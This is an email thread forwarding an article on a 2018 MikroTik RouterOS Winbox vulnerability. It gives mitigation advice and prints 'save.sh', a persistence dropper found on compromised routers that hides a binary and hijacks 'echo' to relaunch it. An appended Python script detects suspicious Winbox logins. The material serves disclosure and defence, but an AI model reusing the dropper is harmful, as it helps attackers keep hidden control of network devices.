<html><head></head><body><div dir="auto">Everyone, be careful with that version; I had a couple of problems, my pings were going extremely high. Apparently there are changes in the routing.<br><br></div>
<div class="gmail_quote" >On April 24, 2018, at 06:46, Juan Pablo Orsi &lt;<a href="mailto:juanpablo@internetlocal.com.ar" target="_blank">juanpablo@internetlocal.com.ar</a>&gt; wrote:<blockquote class="gmail_quote" style="margin: 0pt 0pt 0pt 0.8ex; border-left: 1px solid rgb(204, 204, 204); padding-left: 1ex;">
<div class="entry-content" style="box-sizing:border-box;margin:0px;padding:0px;border:0px;font-variant-numeric:inherit;font-variant-east-asian:inherit;font-stretch:inherit;line-height:1.62em;text-align:justify"><p style="color:rgb(51,51,51);font-family:inherit;font-size:inherit;box-sizing:border-box;margin:0px 0px 24px;padding:0px;border:0px;font-style:inherit;font-variant:inherit;font-weight:inherit;font-stretch:inherit;line-height:inherit">Today <a href="http://mikrotik.com/" target="_blank" style="box-sizing:border-box;background-color:transparent;color:rgb(33,117,155);margin:0px;padding:0px;border:0px;font-style:inherit;font-variant:inherit;font-weight:inherit;font-stretch:inherit;font-size:inherit;line-height:inherit;font-family:inherit">MikroTik</a> published a<span style="box-sizing:border-box;margin:0px;padding:0px;border:0px;font-style:inherit;font-variant:inherit;font-weight:inherit;font-stretch:inherit;font-size:inherit;line-height:inherit;font-family:inherit;color:rgb(255,0,0)"> <a href="https://forum.mikrotik.com/viewtopic.php?f=21&t=133533&p=656255" target="_blank" rel="noopener" style="box-sizing:border-box;background-color:transparent;color:rgb(255,0,0);margin:0px;padding:0px;border:0px;font-style:inherit;font-variant:inherit;font-weight:inherit;font-stretch:inherit;font-size:inherit;line-height:inherit;font-family:inherit"><span style="box-sizing:border-box;font-weight:600;margin:0px;padding:0px;border:0px;font-style:inherit;font-variant:inherit;font-stretch:inherit;font-size:inherit;line-height:inherit;font-family:inherit">security alert</span></a> about a <span style="box-sizing:border-box;font-weight:600;margin:0px;padding:0px;border:0px;font-style:inherit;font-variant:inherit;font-stretch:inherit;font-size:inherit;line-height:inherit;font-family:inherit">vulnerability in RouterOS that affects all versions since v6.29.</span></span></p><p 
style="color:rgb(51,51,51);font-family:inherit;font-size:inherit;box-sizing:border-box;margin:0px 0px 24px;padding:0px;border:0px;font-style:inherit;font-variant:inherit;font-weight:inherit;font-stretch:inherit;line-height:inherit">According to the alert, the vulnerability was discovered by them and they recommend updating <span style="box-sizing:border-box;font-weight:600;margin:0px;padding:0px;border:0px;font-style:inherit;font-variant:inherit;font-stretch:inherit;font-size:inherit;line-height:inherit;font-family:inherit">ASAP</span> (<span style="box-sizing:border-box;font-weight:600;margin:0px;padding:0px;border:0px;font-style:inherit;font-variant:inherit;font-stretch:inherit;font-size:inherit;line-height:inherit;font-family:inherit">as soon as possible</span>).</p><blockquote style="color:rgb(68,68,68);font-family:Georgia,'URW Bookman L',serif;font-size:inherit;box-sizing:border-box;padding:0px;margin:0px 30px 0px 60px;border:0px;font-style:italic;font-variant:inherit;font-weight:inherit;font-stretch:inherit;line-height:inherit;quotes:none"><p style="box-sizing:border-box;margin:0px;padding:0px;border:0px;font-style:inherit;font-variant:inherit;font-weight:inherit;font-stretch:inherit;font-size:inherit;line-height:inherit;font-family:inherit"><span style="box-sizing:border-box;font-weight:600;margin:0px;padding:0px;border:0px;font-style:inherit;font-variant:inherit;font-stretch:inherit;font-size:inherit;line-height:inherit;font-family:inherit">The vulnerability allows a “<em style="box-sizing:border-box;margin:0px;padding:0px;border:0px;font-variant:inherit;font-weight:inherit;font-stretch:inherit;font-size:inherit;line-height:inherit;font-family:inherit">special tool</em>” to connect to the Winbox port and request the system user database.</span></p></blockquote><p style="color:rgb(51,51,51);font-family:inherit;font-size:inherit;box-sizing:border-box;margin:0px 0px 
24px;padding:0px;border:0px;font-style:inherit;font-variant:inherit;font-weight:inherit;font-stretch:inherit;line-height:inherit">To address this, the following is recommended:</p><ul style="color:rgb(51,51,51);font-family:inherit;font-size:inherit;box-sizing:border-box;margin:0px 0px 24px 30px;padding:0px;border:0px;font-style:inherit;font-variant:inherit;font-weight:inherit;font-stretch:inherit;line-height:inherit;list-style-position:initial"><li style="box-sizing:border-box;margin:4px 0px 0px;padding:0px;border:0px;font-style:inherit;font-variant:inherit;font-weight:inherit;font-stretch:inherit;font-size:inherit;line-height:inherit;font-family:inherit">Update to<span style="box-sizing:border-box;font-weight:600;margin:0px;padding:0px;border:0px;font-style:inherit;font-variant:inherit;font-stretch:inherit;font-size:inherit;line-height:inherit;font-family:inherit"> v6.42.1</span> and <span style="box-sizing:border-box;font-weight:600;margin:0px;padding:0px;border:0px;font-style:inherit;font-variant:inherit;font-stretch:inherit;font-size:inherit;line-height:inherit;font-family:inherit">v6.43rc4</span> *<span style="box-sizing:border-box;margin:0px;padding:0px;border:0px;font-style:inherit;font-variant:inherit;font-weight:inherit;font-stretch:inherit;font-size:inherit;line-height:inherit;font-family:inherit;color:rgb(255,102,0)"><span style="box-sizing:border-box;font-weight:600;margin:0px;padding:0px;border:0px;font-style:inherit;font-variant:inherit;font-stretch:inherit;font-size:inherit;line-height:inherit;font-family:inherit">With caution</span></span> (read further below)</li><li style="box-sizing:border-box;margin:4px 0px 0px;padding:0px;border:0px;font-style:inherit;font-variant:inherit;font-weight:inherit;font-stretch:inherit;font-size:inherit;line-height:inherit;font-family:inherit"><span 
style="box-sizing:border-box;font-weight:600;margin:0px;padding:0px;border:0px;font-style:inherit;font-variant:inherit;font-stretch:inherit;font-size:inherit;line-height:inherit;font-family:inherit">Close the Winbox port to public access</span> using an <em style="box-sizing:border-box;margin:0px;padding:0px;border:0px;font-variant:inherit;font-weight:inherit;font-stretch:inherit;font-size:inherit;line-height:inherit;font-family:inherit">address list</em> and the <em style="box-sizing:border-box;margin:0px;padding:0px;border:0px;font-variant:inherit;font-weight:inherit;font-stretch:inherit;font-size:inherit;line-height:inherit;font-family:inherit">firewall</em> in the <em style="box-sizing:border-box;margin:0px;padding:0px;border:0px;font-variant:inherit;font-weight:inherit;font-stretch:inherit;font-size:inherit;line-height:inherit;font-family:inherit">input</em> chain</li><li style="box-sizing:border-box;margin:4px 0px 0px;padding:0px;border:0px;font-style:inherit;font-variant:inherit;font-weight:inherit;font-stretch:inherit;font-size:inherit;line-height:inherit;font-family:inherit"><span style="box-sizing:border-box;font-weight:600;margin:0px;padding:0px;border:0px;font-style:inherit;font-variant:inherit;font-stretch:inherit;font-size:inherit;line-height:inherit;font-family:inherit">Restrict the allowed IP range</span> in <em style="box-sizing:border-box;margin:0px;padding:0px;border:0px;font-variant:inherit;font-weight:inherit;font-stretch:inherit;font-size:inherit;line-height:inherit;font-family:inherit">ip &gt; service &gt; winbox</em> to local networks only.</li><li style="box-sizing:border-box;margin:4px 0px 0px;padding:0px;border:0px;font-style:inherit;font-variant:inherit;font-weight:inherit;font-stretch:inherit;font-size:inherit;line-height:inherit;font-family:inherit"><span 
style="box-sizing:border-box;font-weight:600;margin:0px;padding:0px;border:0px;font-style:inherit;font-variant:inherit;font-stretch:inherit;font-size:inherit;line-height:inherit;font-family:inherit">Change the users' passwords.</span></li></ul><p style="color:rgb(51,51,51);font-family:inherit;font-size:inherit;box-sizing:border-box;margin:0px 0px 24px;padding:0px;border:0px;font-style:inherit;font-variant:inherit;font-weight:inherit;font-stretch:inherit;line-height:inherit"><span style="box-sizing:border-box;font-weight:600;margin:0px;padding:0px;border:0px;font-style:inherit;font-variant:inherit;font-stretch:inherit;font-size:inherit;line-height:inherit;font-family:inherit">It is important to keep in mind</span> that in recent versions of <span style="box-sizing:border-box;font-weight:600;margin:0px;padding:0px;border:0px;font-style:inherit;font-variant:inherit;font-stretch:inherit;font-size:inherit;line-height:inherit;font-family:inherit">RouterOS</span><span style="box-sizing:border-box;font-weight:600;margin:0px;padding:0px;border:0px;font-style:inherit;font-variant:inherit;font-stretch:inherit;font-size:inherit;line-height:inherit;font-family:inherit"> there is a new bridge handling scheme</span>, so certain precautions must be taken when updating, because there have been cases of failed updates in configurations that have a bridge and use the switch chip.</p><p style="color:rgb(51,51,51);font-family:inherit;font-size:inherit;box-sizing:border-box;margin:0px 0px 24px;padding:0px;border:0px;font-style:inherit;font-variant:inherit;font-weight:inherit;font-stretch:inherit;line-height:inherit">For devices that are in production and where the operating system cannot be updated quickly, it is <span style="box-sizing:border-box;font-weight:600;margin:0px;padding:0px;border:0px;font-style:inherit;font-variant:inherit;font-stretch:inherit;font-size:inherit;line-height:inherit;font-family:inherit"><span 
style="box-sizing:border-box;margin:0px;padding:0px;border:0px;font-style:inherit;font-variant:inherit;font-weight:inherit;font-stretch:inherit;font-size:inherit;line-height:inherit;font-family:inherit;color:rgb(255,0,0)">mandatory to close Winbox access and change the users' passwords.</span></span></p><p style="color:rgb(51,51,51);font-family:inherit;font-size:inherit;box-sizing:border-box;margin:0px 0px 24px;padding:0px;border:0px;font-style:inherit;font-variant:inherit;font-weight:inherit;font-stretch:inherit;line-height:inherit">For now it is not possible to know or detect whether the system has been compromised, so applying the previous point is also recommended.</p><p style="box-sizing:border-box;margin:0px 0px 24px;padding:0px;border:0px;font-variant-numeric:inherit;font-variant-east-asian:inherit;font-stretch:inherit;line-height:inherit"><font color="#333333" face="Lato, sans-serif"><span style="font-size:17px"><a href="https://forum.mikrotik.com/viewtopic.php?f=21&t=133533&p=656255">https://forum.mikrotik.com/viewtopic.php?f=21&t=133533&p=656255</a></span></font><br></p><h4 style="color:inherit;font-family:'Open Sans',sans-serif;font-size:18px;box-sizing:border-box;font-weight:300;line-height:1.62em;margin:0px 0px 18px;padding:0px;border:0px;font-style:inherit;font-variant:inherit;font-stretch:inherit;letter-spacing:1px"><span style="box-sizing:border-box;margin:0px;padding:0px;border:0px;font-style:inherit;font-variant:inherit;font-weight:inherit;font-stretch:inherit;font-size:inherit;line-height:inherit;font-family:inherit;color:rgb(255,0,0)"><span style="box-sizing:border-box;font-weight:600;margin:0px;padding:0px;border:0px;font-style:inherit;font-variant:inherit;font-stretch:inherit;font-size:inherit;line-height:inherit;font-family:inherit">UPDATE</span></span>:</h4><p style="color:rgb(51,51,51);font-family:inherit;font-size:inherit;box-sizing:border-box;margin:0px 0px 
24px;padding:0px;border:0px;font-style:inherit;font-variant:inherit;font-weight:inherit;font-stretch:inherit;line-height:inherit">Some users are reporting that they find two files inside <em style="box-sizing:border-box;margin:0px;padding:0px;border:0px;font-variant:inherit;font-weight:inherit;font-stretch:inherit;font-size:inherit;line-height:inherit;font-family:inherit"><span style="box-sizing:border-box;font-weight:600;margin:0px;padding:0px;border:0px;font-style:inherit;font-variant:inherit;font-stretch:inherit;font-size:inherit;line-height:inherit;font-family:inherit">files</span></em>: one named <em style="box-sizing:border-box;margin:0px;padding:0px;border:0px;font-variant:inherit;font-weight:inherit;font-stretch:inherit;font-size:inherit;line-height:inherit;font-family:inherit"><span style="box-sizing:border-box;font-weight:600;margin:0px;padding:0px;border:0px;font-style:inherit;font-variant:inherit;font-stretch:inherit;font-size:inherit;line-height:inherit;font-family:inherit">dnstest</span></em> with binary content, and <span style="box-sizing:border-box;font-weight:600;margin:0px;padding:0px;border:0px;font-style:inherit;font-variant:inherit;font-stretch:inherit;font-size:inherit;line-height:inherit;font-family:inherit"><em style="box-sizing:border-box;margin:0px;padding:0px;border:0px;font-variant:inherit;font-weight:inherit;font-stretch:inherit;font-size:inherit;line-height:inherit;font-family:inherit">save.sh</em> </span>with the following content:</p><pre style="color:rgb(0,0,0);font-family:Monaco,Consolas,'Lucida Console','Bitstream Vera Sans Mono',monospace;font-size:12px;box-sizing:border-box;overflow:auto;padding:15px;margin-top:0px;margin-bottom:24px;line-height:1.62em;word-break:break-all;word-wrap:break-word;background:rgb(248,248,248);border:1px dashed rgb(227,227,227);border-radius:4px;font-style:inherit;font-variant:inherit;font-weight:inherit;font-stretch:inherit">#!/bin/ash
case "$PATH" in
*/usr/local/bin*)
# old versions
dest="/usr/local/bin/"
;;
*)
dest="/flash/bin/"
if [ ! -d "/flash/" ]; then
exit 1
fi
;;
esac
if [ -f $dest/.dnstest ]; then
rm $dest/.dnstest
fi
if [ -f $dest/echo ]; then
rm $dest/echo
fi
if [ -f $dest/.test ]; then
rm $dest/.test
fi
mkdir -p $dest
export PATH=$PATH:$dest
chmod a+x /flash/rw/pckg/dnstest
cp /flash/rw/pckg/dnstest $dest/.dnstest
echo -e "#!/bin/ash\nusleep 180000000\ncp $dest.dnstest /tmp/.dnstest\n/tmp/.dnstest*" > $dest/.test
chmod +x $dest/.test
echo -e "#!/bin/ash\n/$dest.test&\n/bin/echo \$*" > $dest/echo
chmod +x $dest/echo
/flash/rw/pckg/dnstest
rm save.sh
</pre><p style="color:rgb(51,51,51);font-family:inherit;font-size:inherit;box-sizing:border-box;margin:0px 0px 24px;padding:0px;border:0px;font-style:inherit;font-variant:inherit;font-weight:inherit;font-stretch:inherit;line-height:inherit"><span style="box-sizing:border-box;font-weight:600;margin:0px;padding:0px;border:0px;font-style:inherit;font-variant:inherit;font-stretch:inherit;font-size:inherit;line-height:inherit;font-family:inherit">The attempt behaves as follows:</span></p><p style="color:rgb(51,51,51);font-family:inherit;font-size:inherit;box-sizing:border-box;margin:0px 0px 24px;padding:0px;border:0px;font-style:inherit;font-variant:inherit;font-weight:inherit;font-stretch:inherit;line-height:inherit">As seen in the following screenshot, the first access is a failed Winbox attempt, so it is presumed that it has access to the user DB. The next access is then made with the user that has <em style="box-sizing:border-box;margin:0px;padding:0px;border:0px;font-variant:inherit;font-weight:inherit;font-stretch:inherit;font-size:inherit;line-height:inherit;font-family:inherit">full</em> permissions.</p><p style="color:rgb(51,51,51);font-family:inherit;font-size:inherit;box-sizing:border-box;margin:0px 0px 24px;padding:0px;border:0px;font-style:inherit;font-variant:inherit;font-weight:inherit;font-stretch:inherit;line-height:inherit"><img src="https://i.imgur.com/7XbVAWy.png" alt="Access behaviour" style="box-sizing: border-box; border-width: 0px; border-style: initial; vertical-align: middle; margin: 0px; padding: 0px; font-style: inherit; font-variant: inherit; font-weight: inherit; font-stretch: inherit; font-size: inherit; line-height: inherit; font-family: inherit; max-width: 100%; height: auto;"></p></div>
</blockquote></div></body></html>
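Added example, not part of the original messages or of MikroTik's advisory: a heuristic that searches an exported RouterOS log for the access pattern described in the forwarded update, a failed Winbox login followed shortly by a successful one from the same address. The log layout, the 60-second window, the `year` parameter and the sample lines are assumptions constructed for illustration; a match is a lead to investigate, not proof of compromise.

```python
import re
from datetime import datetime, timedelta

# Constructed sample, not real traffic. Assumed layout of an exported RouterOS
# log: "mon/dd hh:mm:ss topics message". Addresses are documentation ranges.
SAMPLE_LOG = """\
apr/24 06:40:12 system,error,critical login failure for user admin from 203.0.113.7 via winbox
apr/24 06:40:14 system,info,account user admin logged in from 203.0.113.7 via winbox
apr/24 06:41:02 system,info,account user admin logged out from 203.0.113.7 via winbox
apr/24 07:15:30 system,error,critical login failure for user noc from 192.168.88.20 via winbox
apr/24 09:02:11 system,info,account user noc logged in from 192.168.88.20 via winbox
apr/24 09:30:00 system,info,account user admin logged in from 192.168.88.5 via ssh
"""

# Only winbox login failures and winbox logins are of interest here.
LINE = re.compile(
    r"^(?P<ts>\w{3}/\d{2} \d{2}:\d{2}:\d{2}) \S+ "
    r"(?:login failure for user (?P<failed>\S+)|user (?P<ok>\S+) logged in)"
    r" from (?P<ip>\S+) via winbox$"
)


def suspicious_winbox_logins(log_text, window_seconds=60, year=2018):
    """Return (ip, user, timestamp) for every winbox login that follows a
    failed winbox attempt from the same address within window_seconds."""
    window = timedelta(seconds=window_seconds)
    last_failure = {}  # source address -> time of its latest failed attempt
    hits = []
    for line in log_text.splitlines():
        m = LINE.match(line.strip())
        if m is None:
            continue  # other services, logouts and unrelated messages
        # The log carries no year, so one is supplied to get a full date.
        ts = datetime.strptime(f"{year}/{m['ts']}", "%Y/%b/%d %H:%M:%S")
        ip = m["ip"]
        if m["failed"]:
            last_failure[ip] = ts
        elif ip in last_failure and ts - last_failure.pop(ip) <= window:
            hits.append((ip, m["ok"], m["ts"]))
    return hits


if __name__ == "__main__":
    for ip, user, when in suspicious_winbox_logins(SAMPLE_LOG):
        print(f"{when}  {user} logged in from {ip} right after a failed attempt")
```

Widening `window_seconds` trades fewer misses for more noise from operators who simply mistyped a password.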